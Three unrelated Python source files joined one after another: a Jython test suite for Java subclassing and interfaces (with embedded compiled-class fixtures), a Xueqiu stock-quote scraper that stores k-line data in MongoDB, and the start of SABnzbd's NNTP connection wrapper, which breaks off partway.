from java.awt import Color, Component, Dimension, Rectangle
from javax.swing import ComboBoxModel, ListModel
from javax.swing.table import AbstractTableModel
from javax.swing.tree import DefaultTreeModel, DefaultMutableTreeNode
from org.python.tests import BeanInterface, Callbacker, Coercions, OwnMethodCaller
from javatests import (
InheritanceA, InheritanceB, InheritanceC, InheritanceD,
ExtendedInterface, UseExtendedInterface)
class InterfaceTest(unittest.TestCase):
def test_java_calling_python_interface_implementation(self):
called = []
class PyCallback(Callbacker.Callback):
def call(self, extraarg=None):
called.append(extraarg)
Callbacker.callNoArg(PyCallback())
Callbacker.callOneArg(PyCallback(), 4294967295L)
self.assertEquals(None, called[0])
self.assertEquals(4294967295L, called[1])
class PyBadCallback(Callbacker.Callback):
def call(pyself, extraarg):
self.fail("Shouldn't be callable with a no args")
self.assertRaises(TypeError, Callbacker.callNoArg, PyBadCallback())
def test_inheriting_from_python_and_java_interface(self):
calls = []
class Runner(Runnable):
def run(self):
calls.append("Runner.run")
class ComparableRunner(Comparable, Runner):
def compareTo(self, other):
calls.append("ComparableRunner.compareTo")
return 0
c = ComparableRunner()
c.compareTo(None)
c.run()
self.assertEquals(calls, ["ComparableRunner.compareTo", "Runner.run"])
def test_inherit_interface_twice(self):
# http://bugs.jython.org/issue1504
class A(ListModel): pass
class B(A, ComboBoxModel): pass
# Regression caused B's proxy to occur in B's mro twice. That
# caused the declaration of C to fail with an inconsistent mro
class C(B): pass
class TableModelTest(unittest.TestCase):
def test_class_coercion(self):
'''Python type instances coerce to a corresponding Java wrapper type in Object.getClass'''
class TableModel(AbstractTableModel):
columnNames = "First Name", "Last Name","Sport","# of Years","Vegetarian"
data = [("Mary", "Campione", "Snowboarding", 5, False)]
def getColumnCount(self):
return len(self.columnNames)
def getRowCount(self):
return len(self.data)
def getColumnName(self, col):
return self.columnNames[col]
def getValueAt(self, row, col):
return self.data[row][col]
def getColumnClass(self, c):
return Object.getClass(self.getValueAt(0, c))
def isCellEditable(self, row, col):
return col >= 2
model = TableModel()
for i, expectedClass in enumerate([String, String, String, Integer, Boolean]):
self.assertEquals(expectedClass, model.getColumnClass(i))
class AutoSuperTest(unittest.TestCase):
def test_auto_super(self):
class Implicit(Rectangle):
def __init__(self):
self.size = Dimension(6, 7)
class Explicit(Rectangle):
def __init__(self):
Rectangle.__init__(self, 6, 7)
self.assert_("width=6,height=7" in Implicit().toString())
self.assert_("width=6,height=7" in Explicit().toString())
def test_no_default_constructor(self):
"Check autocreation when java superclass misses a default constructor."
class A(ThreadGroup):
def __init__(self):
print self.name
self.assertRaises(TypeError, A)
# The no-arg constructor for proxies attempts to look up its Python class by the Python class' name,
# so the class needs to be visible at the module level or the import will fail
class ModuleVisibleJavaSubclass(Object):
pass
class PythonSubclassesTest(unittest.TestCase):
def test_multiple_inheritance_prohibited(self):
try:
class MultiJava(Dimension, Color):
pass
self.fail("Shouldn't be able to subclass more than one concrete java class")
except TypeError:
pass
class PyDim(Dimension):
pass
class PyDimRun(PyDim, Runnable):
pass
try:
class PyDimRunCol(PyDimRun, Color):
pass
self.fail("Shouldn't be able to subclass more than one concrete java class")
except TypeError:
pass
def test_multilevel_override(self):
runs = []
class SubDate(Date):
def run(self):
runs.append("SubDate")
def method(self):
return "SubDateMethod"
def toString(self):
s = Date.toString(self)
return 'SubDate -> Date'
class SubSubDate(SubDate, Runnable):
def toString(self):
return 'SubSubDate -> ' + SubDate.toString(self)
self.assertEquals("SubDate -> Date", SubDate().toString())
self.assertEquals("SubSubDate -> SubDate -> Date", SubSubDate().toString())
self.assertEquals("SubDateMethod", SubSubDate().method())
Coercions.runRunnable(SubSubDate())
self.assertEquals(["SubDate"], runs)
def test_passthrough(self):
class CallbackPassthrough(Callbacker.Callback):
def __init__(self, worker):
self.worker = worker
def __getattribute__(self, name):
if name == 'call':
return getattr(self.worker, name)
return object.__getattribute__(self, name)
collector = Callbacker.CollectingCallback()
c = CallbackPassthrough(collector)
Callbacker.callNoArg(c)
self.assertEquals("call()", collector.calls[0])
c.call(7)
self.assertEquals("call(7)", collector.calls[1])
def test_Class_newInstance_works_on_proxies(self):
Class.newInstance(ModuleVisibleJavaSubclass)
def test_override(self):
class Foo(Runnable):
def toString(self): return "Foo"
self.assertEquals(String.valueOf(Foo()), "Foo", "toString not overridden in interface")
class A(Object):
def toString(self):
return 'name'
self.assertEquals('name', String.valueOf(A()), 'toString not overriden in subclass')
def test_can_subclass_abstract(self):
class A(Component):
pass
A()
def test_return_proxy(self):
"Jython proxies properly return back from Java code"
class FooVector(Vector):
bar = 99
ht = Hashtable()
fv = FooVector()
ht.put("a", fv)
self.failUnless(fv is ht.get("a"))
def test_proxy_generates_protected_methods(self):
"""Jython proxies should generate methods for protected methods on their superclasses
Tests for bug #416871"""
output = []
class RegularBean(BeanInterface):
def __init__(self):
output.append("init")
def getName(self):
output.append("getName")
class FinalizingBean(RegularBean):
def finalize(self):
pass
def clone(self):
return self.__class__()
for a in FinalizingBean(), RegularBean():
self.assertEquals("init", output.pop())
a.getName()
self.assertEquals("getName", output.pop())
aa = a.clone()
if isinstance(a, FinalizingBean):
self.assertEquals("init", output.pop())
aa.name
self.assertEquals("getName", output.pop())
def test_python_subclass_of_python_subclass_of_java_class_overriding(self):
'''Test for http://bugs.jython.org/issue1297.
Checks that getValue on SecondSubclass is overriden correctly when called from Java.'''
class FirstSubclass(OwnMethodCaller):
pass
class SecondSubclass(FirstSubclass):
def getValue(self):
return 10
self.assertEquals(10, SecondSubclass().callGetValue())
def test_deep_subclasses(self):
'''Checks for http://bugs.jython.org/issue1363.
Inheriting several classes deep from a Java class caused inconsistent MROs.'''
class A(Object): pass
class B(A): pass
class C(B): pass
class D(C): pass
d = D()
"""
public abstract class Abstract {
public Abstract() {
method();
}
public abstract void method();
}
"""
# The following is the correspoding bytecode for Abstract compiled with javac 1.5
ABSTRACT_CLASS = """\
eJw1TrsKwkAQnI1nEmMe/oKdSaHYiyCClWih2F+SQyOaQDz9LxsFCz/AjxL3Am6xw8zs7O7n+3oD
GKPnQcD30ELgIHQQEexJURZ6SmgN4h1BzKtcEaJlUarV9ZyqeivTEyv2WelDlRO8TXWtM7UojBrM
0ouuZaaHR3mTPtqwfXRgE9y/Q+gZb3SS5X60To8q06LPHwiYskAmxN1hFjMSYyd5gpIHrDsT3sU9
5IgZF4wuhCBzpnG9Ru/+AF4RJn8=
""".decode('base64').decode('zlib')
class AbstractOnSyspathTest(unittest.TestCase):
'''Subclasses an abstract class that isn't on the startup classpath.
Checks for http://jython.org/bugs/1861985
'''
def setUp(self):
out = open('Abstract.class', 'wb')
out.write(ABSTRACT_CLASS)
out.close()
self.orig_syspath = sys.path[:]
sys.path.append('')
def tearDown(self):
os.unlink('Abstract.class')
sys.path = self.orig_syspath
def test_can_subclass_abstract(self):
import Abstract
class A(Abstract):
def method(self):
pass
A()
"""
public abstract class ContextAbstract {
public ContextAbstract() {
method();
}
public abstract void method();
}
"""
# The following is the correspoding bytecode for ContextAbstract compiled with javac 1.5
# Needs to be named differently than Abstract above so the class loader won't just use it
CONTEXT_ABSTRACT = """\
eJxdTsEOwVAQnK2n1aq2Bz/ghgNxF4lInIQDcX9tX6jQJvWI33IhcfABPkrs69EedjKzM7v7+b7e
AEaIPAj4HmpoOQgchAR7nOWZnhBq3d6WIGZFqgjhIsvV8nKKVbmR8ZEV+6T0vkgJ3rq4lImaZ0Zt
z4pcq5uexmddykQPDvIqfdRh+3Bh86I/AyEyluFR5rvhKj6oRIsO/yNgygKZLHeHWY+RGN3+E9R/
wLozITS4BxwxdsHYgBBkrlVTr9KbP6qaLFc=
""".decode('base64').decode('zlib')
class ContextClassloaderTest(unittest.TestCase):
'''Classes on the context classloader should be importable and subclassable.
http://bugs.jython.org/issue1216'''
def setUp(self):
self.orig_context = Thread.currentThread().contextClassLoader
class AbstractLoader(ClassLoader):
def __init__(self):
ClassLoader.__init__(self)
c = self.super__defineClass("ContextAbstract", CONTEXT_ABSTRACT, 0,
len(CONTEXT_ABSTRACT), ClassLoader.protectionDomain)
self.super__resolveClass(c)
Thread.currentThread().contextClassLoader = AbstractLoader()
def tearDown(self):
Thread.currentThread().contextClassLoader = self.orig_context
def test_can_subclass_abstract(self):
import ContextAbstract
called = []
class A(ContextAbstract):
def method(self):
called.append(True)
A()
self.assertEquals(len(called), 1)
class MetaClass(type):
def __new__(meta, name, bases, d):
# Insert the method to be called from Java
def call(self):
return self.x
d["call"] = call
d["foo"] = 99
return super(MetaClass, meta).__new__(meta, name, bases, d)
class MetaBase(object):
__metaclass__ = MetaClass
class MetaClassTest(unittest.TestCase):
def test_java_with_metaclass_base(self):
"""Java classes can be mixed with Python bases using metaclasses"""
# Permute mixin order
class Bar(MetaBase, Callable):
def __init__(self, x):
self.x = x
class Baz(Callable, MetaBase):
def __init__(self, x):
self.x = x
# Go through {bar|baz}.call indirectly through a Java path,
# just to ensure this mixin provided by the metaclass is available
pool = Executors.newSingleThreadExecutor()
bar = Bar(42)
self.assertEqual(bar.foo, 99)
self.assertEqual(42, pool.submit(bar).get())
baz = Baz(47)
self.assertEqual(baz.foo, 99)
self.assertEqual(47, pool.submit(baz).get())
pool.shutdown()
class AbstractMethodTest(unittest.TestCase):
def test_abstract_method_implemented(self):
class C(AbstractList):
def get(self, index):
return index * 2
def size(self):
return 7
c = C()
self.assertEqual(c.size(), 7)
self.assertEqual([c.get(i) for i in xrange(7)], range(0, 14, 2))
def test_abstract_method_not_implemented(self):
class C(AbstractList):
def size(self):
return 47
# note that unlike ABCs in Python - or partial extensions
# of abstract classes in Java - we allow such classes to
# be instantiated. We may wish to change this in Jython
# 3.x
c = C()
self.assertEqual(c.size(), 47)
msg = r"^'C' object does not implement abstract method 'get' from 'java.util.AbstractList'$"
with self.assertRaisesRegexp(NotImplementedError, msg):
C().get(42)
def test_concrete_method(self):
class H(HashSet):
def __init__(self):
self.added = 0
HashSet.__init__(self)
def add(self, value):
self.added += 1
HashSet.add(self, value)
h = H()
h.add(42)
h.add(47)
h.discard(47)
self.assertEqual(list(h), [42])
self.assertEqual(h.added, 2)
def test_interface_method_implemented(self):
class C(Callable):
def call(self):
return 42
self.assertEqual(C().call(), 42)
def test_interface_method_not_implemented(self):
class C(Callable):
pass
msg = r"^'C' object does not implement abstract method 'call' from 'java.util.concurrent.Callable'$"
with self.assertRaisesRegexp(NotImplementedError, msg):
C().call()
class SuperIsSuperTest(unittest.TestCase):
# Testing how the vision described in Raymond Hettinger's blog
# https://rhettinger.wordpress.com/2011/05/26/super-considered-super/
# - super in Python is really next-method - can be merged with
# Java's super, which is a conventional super that dispatches up
# the class inheritance hierarchy
def test_super_dispatches_through_proxy(self):
# Verify fix for http://bugs.jython.org/issue1540
class MyList(ArrayList):
def get(self, index):
return super(MyList, self).get(index)
def toString(self):
return "MyList<<<" + super(MyList, self).toString() + ">>>"
my_list = MyList([0, 1, 2, 3, 4, 5])
self.assertEqual(my_list.get(5), 5)
self.assertEqual(
str(my_list),
"MyList<<<[0, 1, 2, 3, 4, 5]>>>")
self.assertEqual(my_list.size(), 6)
class HierarchyTest(unittest.TestCase):
# Attempt to expand upon the inheritance hierarchy described as
# being a bug in http://bugs.jython.org/issue2104, but this test
# currently only confirms existing behavior.
def assertB(self, b2, level, cls):
self.assertIsInstance(b2, cls)
self.assertEqual(b2.whoAmI(), level)
self.assertEqual(b2.staticWhoAmI(), level)
self.assertEqual(b2.root(), "A")
self.assertEqual(b2.staticRoot(), "A")
self.assertEqual(b2.everyOther(), "A")
self.assertEqual(b2.notInAbstract(), "B")
def test_b(self):
b = InheritanceB()
self.assertB(b.replicateMe(), "B", InheritanceB)
self.assertB(b.build(), "B", InheritanceB)
with self.assertRaises(UnsupportedOperationException):
b.replicateParent()
with self.assertRaises(UnsupportedOperationException):
b.buildParent()
def assertC(self, c2, level, cls):
self.assertIsInstance(c2, cls)
self.assertEqual(c2.whoAmI(), level)
self.assertEqual(c2.staticWhoAmI(), level)
self.assertEqual(c2.root(), "A")
self.assertEqual(c2.staticRoot(), "A")
self.assertEqual(c2.everyOther(),
"C" if isinstance(c2, InheritanceC) else "A")
self.assertEqual(c2.notInAbstract(), "B")
def test_c(self):
c = InheritanceC()
self.assertC(c.replicateMe(), "C", InheritanceC)
self.assertC(c.replicateParent(), "B", InheritanceB)
self.assertC(c.build(), "C", InheritanceC)
self.assertC(c.buildParent(), "B", InheritanceB)
def assertD(self, d2, level, cls):
self.assertIsInstance(d2, cls)
self.assertEqual(d2.whoAmI(), level)
self.assertEqual(d2.staticWhoAmI(), level)
self.assertEqual(d2.root(), "A")
self.assertEqual(d2.staticRoot(), "A")
self.assertEqual(d2.everyOther(), "C")
self.assertEqual(d2.notInAbstract(), "B")
def test_d(self):
d = InheritanceD()
self.assertD(d.replicateMe(), "D", InheritanceD)
self.assertD(d.replicateParent(), "C", InheritanceC)
self.assertD(d.build(), "D", InheritanceD)
self.assertD(d.buildParent(), "C", InheritanceC)
def assertE(self, e2, level, cls, tested):
self.assertIsInstance(e2, cls)
self.assertEqual(e2.whoAmI(), level)
self.assertEqual(e2.staticWhoAmI(), level)
self.assertEqual(e2.root(), "A")
self.assertEqual(e2.staticRoot(), "A")
self.assertEqual(e2.everyOther(),
"E" if isinstance(e2, tested) else "C")
self.assertEqual(e2.notInAbstract(), "B")
def test_e(self):
class E(InheritanceD):
def replicateMe(self):
return E()
def replicateParent(self):
return InheritanceD()
@staticmethod
def build():
return E()
@staticmethod
def buildParent():
return InheritanceD()
def whoAmI(self):
return "E"
@staticmethod
def staticWhoAmI():
return "E"
def everyOther(self):
return "E"
e = E()
self.assertE(e.replicateMe(), "E", E, E)
self.assertE(e.replicateParent(), "D", InheritanceD, E)
self.assertE(e.build(), "E", E, E)
self.assertE(e.buildParent(), "D", InheritanceD, E)
class ChooseCorrectToJavaTest(unittest.TestCase):
# Verifies fix for http://bugs.jython.org/issue1795
#
# Note that we use threading.Thread because we have imported
# java.lang.Thread as Thread
def test_extended_thread(self):
class ExtendedThread(threading.Thread, ExtendedInterface):
def returnSomething(self):
return "yo yo yo"
result = [None]
def f(r):
r[0] = 47
t = ExtendedThread(target=f, args=(result,))
self.assertEqual(
UseExtendedInterface().countWords(t),
3)
# Also verify that t still works as a regular thread
t.start()
t.join()
self.assertFalse(t.isAlive())
self.assertEqual(result[0], 47)
def test_interruption(self):
# based on this code http://www.jython.org/jythonbook/en/1.0/Concurrency.html#interruption,
# which demonstrates __tojava__ works properly
class ExtendedThread(threading.Thread, ExtendedInterface):
def returnSomething(self):
return "yo yo yo"
def wait_until_interrupted(cv):
with cv:
while not Thread.currentThread().isInterrupted():
try:
# this condition variable is never notified, so will only
# succeed if interrupted
cv.wait()
except InterruptedException, e:
break
unfair_condition = threading.Condition()
threads = [
ExtendedThread(
name="thread #%d" % i,
target=wait_until_interrupted,
args=(unfair_condition,))
for i in xrange(5)]
for thread in threads:
thread.start()
for thread in threads:
Thread.interrupt(thread)
for thread in threads:
thread.join(5)
# this assertion only succeeds if threads terminated because
# they were interrupted
for thread in threads:
self.assertFalse(thread.isAlive())
class OldAndNewStyleInitSuperTest(unittest.TestCase):
"""
http://bugs.jython.org/issue2375
"""
def test_new_style_init(self):
class AModel(DefaultTreeModel):
def __init__(self):
super(AModel, self).__init__(DefaultMutableTreeNode())
AModel()
def test_old_style_init(self):
class AModel(DefaultTreeModel):
def __init__(self):
DefaultTreeModel.__init__(self, DefaultMutableTreeNode())
AModel()
def test_main():
test_support.run_unittest(
InterfaceTest,
TableModelTest,
AutoSuperTest,
PythonSubclassesTest,
AbstractOnSyspathTest,
ContextClassloaderTest,
MetaClassTest,
AbstractMethodTest,
SuperIsSuperTest,
OldAndNewStyleInitSuperTest,
HierarchyTest,
ChooseCorrectToJavaTest)
if __name__ == '__main__':
test_main()
|
Xueqiu.py
|
# -*- coding: utf-8 -*-
"""
雪球社区接口类
Created on 03/17/2016
@author: Wen Gu
@contact: emptyset110@gmail.com
"""
# 以下是自动生成的 #
# --- 导入系统配置
import dHydra.core.util as util
from dHydra.core.Vendor import Vendor
from dHydra.core.Functions import get_vendor
# --- 导入自定义配置
from .connection import *
from .const import *
from .config import *
# 以上是自动生成的 #
import pytz
import requests
import asyncio
from pandas import DataFrame
import pandas
from datetime import datetime, timedelta
import functools
import threading
import pymongo
import time
class Xueqiu(Vendor):
def __init__(self):
super().__init__()
self.session = requests.Session()
# 先爬取一遍雪球页面,获取cookies
xq = self.session.get(
"https://xueqiu.com/hq", headers=HEADERS_XUEQIU
)
self.mongodb = None
def login(self, cfg_path=None):
import os
import hashlib
if cfg_path is None:
cfg = util.read_config(os.getcwd() + "/config.json")
else:
cfg = util.read_config(cfg_path)
username = cfg["xueqiuUsername"]
pwd = cfg["xueqiuPassword"].encode("utf8")
pwd = hashlib.md5(pwd).hexdigest().upper()
res = self.session.post(url=URL_XUEQIU_LOGIN, data=DATA_XUEQIU_LOGIN(
username, pwd), headers=HEADERS_XUEQIU)
res_json = res.json()
if "error_code" in res_json:
self.logger.warning("{}".format(res_json))
return res_json()
"""
stockTypeList : list
['sha','shb','sza','szb']分别代表沪A,沪B,深A,深B。如果为空则代表获取所有沪深AB股
e.g: stockTypeList = ['sha','shb']即获取所有沪A沪B
columns : string
默认为:"symbol,name,current,chg,percent,last_close,open,high,low,volume,amount,market_capital,pe_ttm,high52w,low52w,hasexist"
"""
def get_stocks(
self,
stockTypeList=['sha', 'shb', 'sza', 'szb'],
columns=CONST_XUEQIU_QUOTE_ORDER_COLUMN
):
for stockType in stockTypeList:
print("正在从雪球获取:{}".format(EX_NAME[stockType]))
page = 1
while True:
response = self.session.get(
URL_XUEQIU_QUOTE_ORDER(page, columns, stockType),
headers=HEADERS_XUEQIU
).json()
df = DataFrame.from_records(
response["data"], columns=response["column"])
if 'stocks' not in locals().keys():
stocks = df
else:
stocks = stocks.append(df)
if df.size == 0:
break
page += 1
return stocks
def get_symbols(
self,
stockTypeList=['sha', 'shb', 'sza', 'szb']
):
"""
返回:set
"""
symbols = self.get_stocks(
stockTypeList=stockTypeList,
columns='symbol'
)
return set(symbols.symbol)
"""
获取雪球行情/基本面的接口
"""
def get_quotation(self, symbol=None, symbolSet=None, dataframe=True, threadNum=3):
if 'quotation' in self.__dict__.keys():
del(self.quotation)
# Cut symbolList
symbolList = list(symbolSet)
threads = []
symbolListSlice = util.slice_list(num=threadNum, data_list=symbolList)
for symbolList in symbolListSlice:
loop = asyncio.new_event_loop()
symbolsList = util.slice_list(step=50, data_list=symbolList)
tasks = [self.get_quotation_task(
symbols=symbols) for symbols in symbolsList]
t = threading.Thread(target=util.thread_loop, args=(loop, tasks))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
if dataframe:
self.quotation = DataFrame.from_records(self.quotation).T
return(self.quotation)
@asyncio.coroutine
def get_quotation_task(self, symbols):
symbols = util.symbols_to_string(symbols)
quotation = yield from self.fetch_quotation_coroutine(symbols=symbols)
if 'quotation' not in self.__dict__.keys():
self.quotation = quotation
else:
self.quotation.update(quotation)
"""
雪球单股基本面数据获取coroutine
"""
@asyncio.coroutine
def fetch_quotation_coroutine(self, symbols=None):
loop = asyncio.get_event_loop()
if symbols is not None:
async_req = loop.run_in_executor(
None,
functools.partial(
self.session.get,
URL_XUEQIU_QUOTE(symbols),
headers=HEADERS_XUEQIU
)
)
try:
quotation = yield from async_req
except Exception as e:
print(e)
async_req = loop.run_in_executor(
None,
functools.partial(
self.session.get,
URL_XUEQIU_QUOTE(symbols),
headers=HEADERS_XUEQIU
)
)
quotation = yield from async_req
quotation = quotation.json()
return(quotation)
# """
# 雪球单股基本面数据获取
# 默认返回值格式是dict,若参数dataframe为True则返回dataframe
# """
# def fetch_quotation(self, symbols = None, dataframe = False):
# symbols = util.symbols_to_string(symbols)
# if symbols is not None:
# quotation = self.session.get(
# URL_XUEQIU_QUOTE(symbols)
# , headers = HEADERS_XUEQIU
# ).json()
# if dataframe:
# quotation = DataFrame.from_records( quotation ).T
# return(quotation)
"""
雪球历史k线接口,包括前/后复权(默认不复权)
period: 1day,1week,1month
"""
def get_kline(self, symbol, period='1day', fqType='normal', begin=None, end=None, dataframe=True):
if end is None:
end = util.time_now()
if isinstance(begin, str):
begin = util.date_to_timestamp(begin)
if isinstance(end, str):
end = util.date_to_timestamp(end)
try:
response = self.session.get(
URL_XUEQIU_KLINE(symbol=symbol, period=period, fqType=fqType, begin=begin, end=end), headers=HEADERS_XUEQIU, timeout=3
)
kline = response.json()
# time.sleep(0.5)
except Exception as e:
self.logger.warning("{}".format(e))
self.logger.info(response.text)
time.sleep(3)
return False
if kline["success"] == 'true':
if dataframe:
if (kline["chartlist"] is not None) and (kline["chartlist"] != []):
df = DataFrame.from_records(kline["chartlist"])
df["time"] = pandas.to_datetime(df["time"])
df["time"] += timedelta(hours=8)
df["symbol"] = symbol
return df
else:
return DataFrame()
else:
return kline["chartlist"]
else:
return None
"""
将单股票历史k线存入mongodb
"""
def kline_to_mongodb(
self,
symbol,
types=["normal", "before", "after"],
end=None,
dbName='stock',
collectionName='kline_history',
host='localhost',
port=27017
):
if end is None:
end = datetime.now().date()
else:
end = util.string_to_date(end)
if self.mongodb is None:
self.mongodb = get_vendor("DB").get_mongodb(host=host, port=port)
if self.mongodb is False:
self.logger.error("没有连接上mongodb")
return False
for fqType in types:
# 先找到mongodb中这条股票的最新记录
latest = self.mongodb[dbName][collectionName].find_one(
{"symbol" : symbol, "type": fqType}, sort=[("time", -1)]
)
if latest is not None:
begin = (latest["time"] + timedelta(days=1)
).strftime("%Y-%m-%d")
self.logger.info("symbol = {}, {}\t最近更新记录为 {}".format(
symbol, fqType, latest["time"]))
if latest["time"].date() >= end:
self.logger.info("不需要更新")
return True
else:
begin = None
self.logger.info(
"symbol = {}, {}\t无最近更新记录".format(symbol, fqType))
self.logger.info("开始更新symbol = {} \t {}".format(symbol, fqType))
kline = False
while kline is False:
try:
kline = self.get_kline(symbol, begin=begin)
except Exception as e:
self.logger.warning(e)
if len(kline) > 0:
kline["type"] = fqType
kline = kline.iloc[0:len(kline)].to_dict(orient="records")
result = self.mongodb[dbName][
collectionName].insert_many(kline)
self.logger.info(
"更新完毕symbol = {} \t {} \t 插入结果:{}"
.format(symbol, fqType, result)
)
else:
self.logger.info("没有新的记录")
return True
def kline_history(
self,
symbols=None,
end=None,
types=["normal", "before", "after"],
dbName="stock",
collectionName="kline_history",
host="localhost",
port=27017
):
if symbols is None:
# 我选择从新浪获取一份股票列表
sina = get_vendor("Sina")
symbolList = sina.get_symbols()
elif isinstance(symbols, str):
symbolList = symbols.split(',')
else:
symbolList = list(symbols)
for symbol in symbolList:
self.kline_to_mongodb(
symbol,
types=types,
end=end,
dbName=dbName,
collectionName=collectionName,
host=host,
port=port
)
return True
"""
period = '1d' 只显示当日分钟线
= '5d' 5分钟线,250行(最多5个交易日)
= 'all' 历史周线
"""
def get_today(self, symbol, period='1day', dataframe=True):
quotation = self.session.get(
URL_XUEQIU_CHART(symbol=symbol, period=period), headers=HEADERS_XUEQIU
).json()
if quotation["success"] == "true":
if dataframe:
df = DataFrame.from_records(quotation["chartlist"])
df["time"] = pandas.to_datetime(df["time"])
df["time"] += timedelta(hours=8)
df["symbol"] = symbol
return df
else:
return quotation["chartlist"]
else:
return False
def get_combination(self, symbol):
response = self.session.get(
"https://xueqiu.com/cubes/nav_daily/all.json?cube_symbol={}&since=0&until=1469611785000"
.format(symbol),
headers=HEADERS_XUEQIU
)
print(response)
print(response.text)
"""
雪球键盘助手
"""
def keyboard_helper(self, symbol):
response = self.session.get(
"https://xueqiu.com/stock/search.json?code=%s&size=10&_=%s" % (
symbol, int(t.time() * 1000))
).json()["stocks"]
return response
|
newswrapper.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2021 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.newswrapper
"""
import errno
import socket
from threading import Thread
from nntplib import NNTPPermanentError
import time
import logging
import ssl
from typing import List, Optional, Tuple, AnyStr
import sabnzbd
import sabnzbd.cfg
from sabnzbd.constants import DEF_TIMEOUT
from sabnzbd.encoding import utob
from sabnzbd.misc import nntp_to_msg, is_ipv4_addr, is_ipv6_addr, get_server_addrinfo
# Set pre-defined socket timeout
socket.setdefaulttimeout(DEF_TIMEOUT)
class NewsWrapper:
# Pre-define attributes to save memory
__slots__ = (
"server",
"thrdnum",
"blocking",
"timeout",
"article",
"data",
"nntp",
"connected",
"user_sent",
"pass_sent",
"group",
"user_ok",
"pass_ok",
"force_login",
"status_code",
)
def __init__(self, server, thrdnum, block=False):
self.server: sabnzbd.downloader.Server = server
self.thrdnum: int = thrdnum
self.blocking: bool = block
self.timeout: Optional[float] = None
self.article: Optional[sabnzbd.nzbstuff.Article] = None
self.data: List[AnyStr] = []
self.nntp: Optional[NNTP] = None
self.connected: bool = False
self.user_sent: bool = False
self.pass_sent: bool = False
self.user_ok: bool = False
self.pass_ok: bool = False
self.force_login: bool = False
self.group: Optional[str] = None
self.status_code: Optional[int] = None
def init_connect(self):
"""Setup the connection in NNTP object"""
# Server-info is normally requested by initialization of
# servers in Downloader, but not when testing servers
if self.blocking and not self.server.info:
self.server.info = get_server_addrinfo(self.server.host, self.server.port)
# Construct NNTP object
self.nntp = NNTP(self, self.server.hostip)
self.timeout = time.time() + self.server.timeout
def finish_connect(self, code: int):
"""Perform login options"""
if not (self.server.username or self.server.password or self.force_login):
self.connected = True
self.user_sent = True
self.user_ok = True
self.pass_sent = True
self.pass_ok = True
if code == 501 and self.user_sent:
# Change to a sensible text
code = 481
self.data[0] = "%d %s" % (code, T("Authentication failed, check username/password."))
self.status_code = code
self.user_ok = True
self.pass_sent = True
if code == 480:
self.force_login = True
self.connected = False
self.user_sent = False
self.user_ok = False
self.pass_sent = False
self.pass_ok = False
if code in (400, 502):
raise NNTPPermanentError(nntp_to_msg(self.data))
elif not self.user_sent:
command = utob("authinfo user %s\r\n" % self.server.username)
self.nntp.sock.sendall(command)
self.clear_data()
self.user_sent = True
elif not self.user_ok:
if code == 381:
self.user_ok = True
elif code == 281:
# No login required
self.user_ok = True
self.pass_sent = True
self.pass_ok = True
self.connected = True
if self.user_ok and not self.pass_sent:
command = utob("authinfo pass %s\r\n" % self.server.password)
self.nntp.sock.sendall(command)
self.clear_data()
self.pass_sent = True
elif self.user_ok and not self.pass_ok:
if code != 281:
# Assume that login failed (code 481 or other)
raise NNTPPermanentError(nntp_to_msg(self.data))
else:
self.connected = True
self.timeout = time.time() + self.server.timeout
def body(self):
"""Request the body of the article"""
self.timeout = time.time() + self.server.timeout
if self.article.nzf.nzo.precheck:
if self.server.have_stat:
command = utob("STAT <%s>\r\n" % self.article.article)
else:
command = utob("HEAD <%s>\r\n" % self.article.article)
elif self.server.have_body:
command = utob("BODY <%s>\r\n" % self.article.article)
else:
command = utob("ARTICLE <%s>\r\n" % self.article.article)
self.nntp.sock.sendall(command)
self.clear_data()
def send_group(self, group: str):
"""Send the NNTP GROUP command"""
self.timeout = time.time() + self.server.timeout
command = utob("GROUP %s\r\n" % group)
self.nntp.sock.sendall(command)
self.clear_data()
def recv_chunk(self, block: bool = False) -> Tuple[int, bool, bool]:
"""Receive data, return #bytes, done, skip"""
self.timeout = time.time() + self.server.timeout
while 1:
try:
if self.nntp.nw.server.ssl:
# SSL chunks come in 16K frames
# Setting higher limits results in slowdown
chunk = self.nntp.sock.recv(16384)
else:
# Get as many bytes as possible
chunk = self.nntp.sock.recv(262144)
break
except ssl.SSLWantReadError:
# SSL connections will block until they are ready.
# Either ignore the connection until it responds
# Or wait in a loop until it responds
if block:
# time.sleep(0.0001)
continue
else:
return 0, False, True
if not self.data:
try:
self.status_code = int(chunk[:3])
except:
self.status_code = None
# Append so we can do 1 join(), much faster than multiple!
self.data.append(chunk)
# Official end-of-article is ".\r\n" but sometimes it can get lost between 2 chunks
chunk_len = len(chunk)
if chunk[-5:] == b"\r\n.\r\n":
return chunk_len, True, False
elif chunk_len < 5 and len(self.data) > 1:
# We need to make sure the end is not split over 2 chunks
# This is faster than join()
combine_chunk = self.data[-2][-5:] + chunk
if combine_chunk[-5:] == b"\r\n.\r\n":
return chunk_len, True, False
# Still in middle of data, so continue!
return chunk_len, False, False
def soft_reset(self):
"""Reset for the next article"""
self.timeout = None
self.article = None
self.clear_data()
def clear_data(self):
"""Clear the stored raw data"""
self.data = []
self.status_code = None
def hard_reset(self, wait: bool = True, send_quit: bool = True):
"""Destroy and restart"""
if self.nntp:
try:
if send_quit:
self.nntp.sock.sendall(b"QUIT\r\n")
time.sleep(0.01)
self.nntp.sock.close()
except:
pass
self.nntp = None
# Reset all variables (including the NNTP connection)
self.__init__(self.server, self.thrdnum)
# Wait before re-using this newswrapper
if wait:
# Reset due to error condition, use server timeout
self.timeout = time.time() + self.server.timeout
else:
# Reset for internal reasons, just wait 5 sec
self.timeout = time.time() + 5
def __repr__(self):
return "<NewsWrapper: server=%s:%s, thread=%s, connected=%s>" % (
self.server.host,
self.server.port,
self.thrdnum,
self.connected,
)
class NNTP:
# Pre-define attributes to save memory
__slots__ = ("nw", "host", "error_msg", "sock", "fileno")
def __init__(self, nw: NewsWrapper, host):
self.nw: NewsWrapper = nw
self.host: str = host # Store the fastest ip
